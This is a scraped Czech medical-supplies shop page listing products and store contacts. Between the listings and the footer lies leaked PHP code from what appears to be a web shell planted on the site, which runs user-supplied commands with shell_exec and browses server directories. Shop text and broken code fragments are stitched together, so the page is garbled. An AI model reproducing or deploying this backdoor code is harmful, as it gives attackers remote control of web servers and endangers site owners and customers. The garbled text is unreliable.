Náš tip
Korektor Hallufix - korektor s gelovou podložkou
Hallufix ® byl vyvinut vědci a ortopedy pro ...
1 025 Kč
Novinky
Sedačka do sprchy sklopná s podpůrnýma nohama
Sedačka do sprchy sklopná, duralový ...
2 800 Kč
Odsávačka nosních hlenů Nosátko
Nosátko je odsávačka hlenů s připojením ...
319 Kč
Test
Command Output:
';
// Change to the specified directory
$old_cwd = getcwd();
chdir($current_path);
// Execute command based on OS
if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
// Windows
$output .= htmlspecialchars(shell_exec("cmd /c " . escapeshellcmd($command) . " 2>&1"));
} else {
// Unix/Linux
$output .= htmlspecialchars(shell_exec(escapeshellcmd($command) . " 2>&1"));
}
// Restore original directory
chdir($old_cwd);
$output .= '
'; } function show_directory_contents() { global $current_path, $output; $html = '
Current Directory: ' . htmlspecialchars($current_path) . '
'; try { // Navigation bar $html .= ' '; // File table $html .= ''; $html .= ''; // First, show directories $items = scandir($current_path); foreach ($items as $item) { if ($item == '.' || $item == '..') continue; $full_path = $current_path . DIRECTORY_SEPARATOR . $item; if (is_dir($full_path)) { $html .= ''; $html .= ''; $html .= ''; $html .= ''; $html .= ''; $html .= ''; $html .= ''; } } // Then, show files foreach ($items as $item) { if ($item == '.' || $item == '..') continue; $full_path = $current_path . DIRECTORY_SEPARATOR . $item; if (is_file($full_path)) { $ext = strtolower(pathinfo($item, PATHINFO_EXTENSION)); $icon = get_file_icon($ext); $html .= ''; $html .= ''; $html .= ''; $html .= ''; $html .= ''; $html .= ''; $html .= ''; } } $html .= '| Name | Type | Size | Modified | Actions |
|---|---|---|---|---|
kontaktyProdejna zdravotních potřeb Petržílkova - Praha Prodejna zdravotních potřeb Komenského - Olomouc Prodejna zdravotních potřeb Cejl - Brno
Centrála BUŠOVICE |



